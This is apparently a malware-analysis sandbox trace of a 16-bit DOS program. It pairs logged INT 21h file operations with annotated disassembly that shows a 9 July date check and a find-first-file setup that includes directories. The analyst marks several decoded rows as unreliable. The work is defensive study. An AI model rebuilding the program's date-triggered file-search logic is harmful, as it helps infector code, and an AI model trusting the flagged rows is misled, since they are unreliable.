2018-12-25T12:30:50.183997618Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:50.187015373Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:50.190965086Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:50.193793686Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:50.195879443Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:50.205814706Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:50.207576225Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:50.214958881Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:50.225482061Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12b6a after INT 21h "Get date" (op 42 = AH 2Ah), which returns
; DH = month and DL = day, so the cmp on the row above tests DX == 0x0709, i.e. 9 July.
; The run-settings lines visible on this page all give 1 January 1980 and the trace goes on
; to 0x12d93/0x12d9a, which is consistent with the not-equal path; the code at 0x12d1c was
; not observed in these runs, so this trace says nothing about what the date branch does.
0x12b6e: je 0x12b73                               ; date matched -> trampoline at 0x12b73
0x12b70: jmp 0x12d88                              ; any other date: continue at 0x12d88 (not in this excerpt)
0x12b73: jmp 0x12d1c                              ; 9 July only: target not in this excerpt
; NOTE(review): 0x12b76-0x12b85 follows an unconditional jmp and was decoded by linear sweep.
; The first bytes are probably data and the listing looks one byte out of step: read from
; 0x12b7f, the same encodings give push bp / mov bp, sp / sub sp, 0x2c / push si, which
; matches the [bp - 0x2c] buffer used at 0x12b8b. Treat the next eight rows as unreliable.
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8                              ; target not in this excerpt
; No visible trace row has PC 12b90, so the call site below was not observed running here.
0x12b89: mov ah, 0x1a                             ; INT 21h AH=1Ah: set disk transfer address (DTA)
0x12b8b: lea dx, word ptr [bp - 0x2c]             ; DX = address of the local buffer at bp - 0x2c
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e                             ; AH=4Eh: find first matching file
0x12b92: mov cx, 0x10                             ; attribute mask 0x10 = include directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]                 ; DX = 0x19f + word at [0x106]; presumably a load-offset fix-up, confirm
2018-12-25T12:30:50.228269683Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:50.233044861Z 59 PC: 12d9a | Change current directory